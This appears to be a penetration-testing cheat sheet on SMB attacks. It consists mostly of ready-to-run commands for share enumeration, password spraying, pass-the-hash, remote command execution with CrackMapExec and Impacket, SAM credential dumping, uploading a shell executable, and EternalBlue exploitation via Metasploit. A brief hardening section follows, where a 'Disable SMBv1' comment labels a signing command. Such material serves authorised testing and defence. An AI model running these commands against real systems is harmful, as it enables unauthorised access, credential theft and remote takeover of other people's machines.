Home / Network / SMB Attacks
Critical | T1021.002

💣 SMB Attack Techniques

MITRET1021.002
ProtocolSMB/CIFS
Port445, 139
DifficultyMedium

🧠 Description

Server Message Block (SMB) is a network protocol for file sharing, printer sharing, and remote administration. SMB attacks target authentication mechanisms, file operations, and lateral movement through SMB-based tools.

Common SMB Vulnerabilities:
  • EternalBlue (CVE-2017-0144): RCE via SMBv1
  • SMBGhost: SMBv3 compression bug
  • SMB signing disabled: NTLM relay vulnerability
  • Null sessions: Anonymous enumeration

🔍 SMB Enumeration

# Null session enumeration
enum4linux -a target.com
smbclient -L //target.com -N

# With credentials
smbclient //target.com/share -U user%password
enum4linux -a -u user -p password target.com

# List shares
smbmap -H target.com
smbmap -H target.com -u guest

# Check SMB signing
nmap --script smb-security-mode.nse -p 445 target.com

💣 Exploitation

CrackMapExec:

# Password spray
crackmapexec smb 10.10.10.0/24 -u admin -p Password123

# Pass the hash
crackmapexec smb 10.10.10.100 -u administrator -H ntlmhash --local-auth

# Execute command
crackmapexec smb 10.10.10.100 -u admin -p pass -x "whoami"

# Dump SAM
crackmapexec smb 10.10.10.100 -u admin -p pass --local-auth -M sam

Impacket Tools:

# PSEXEC-style access
python3 psexec.py domain/user:password@target.com

# WMI exec
python3 wmiexec.py domain/user:password@target.com

# SMB exec
python3 smbexec.py domain/user:password@target.com

# Kerberos auth
python3 psexec.py -k domain/user@target.com

SMB File Operations:

# Connect to share
smbclient //target.com/C$ -U admin%password

# Download file
get file.txt /tmp/file.txt

# Upload file
put shell.exe \\target.com\C$\Windows\Temp\shell.exe

# List with rpcclient
rpcclient target.com -U admin%password
> enumdomusers
> netshareenum

⚡ EternalBlue Exploitation

# Check if vulnerable
nmap --script smb-vuln-ms17-010.nse -p 445 target.com

# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/bind_tcp
run

# Manual exploit
git clone https://github.com/worawit/MS17-010
python2 send_and_exploit.py target.com

🛡️ Mitigation

✅ Secure SMB Configuration:
  • Disable SMBv1: Required for security
  • Enable SMB signing: Prevent relay attacks
  • Block port 445: From untrusted networks
  • Use Firewall: Limit SMB access to authorized hosts
  • Strong passwords: Prevent credential attacks
# Disable SMBv1
Set-SmbServerConfiguration -RequireSecuritySignature $true
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

# Enable signing via GPO
# Computer Configuration > Policies > Windows Settings > Security Options
# Microsoft network client: Digitally sign communications (always)

📚 References

Back to Network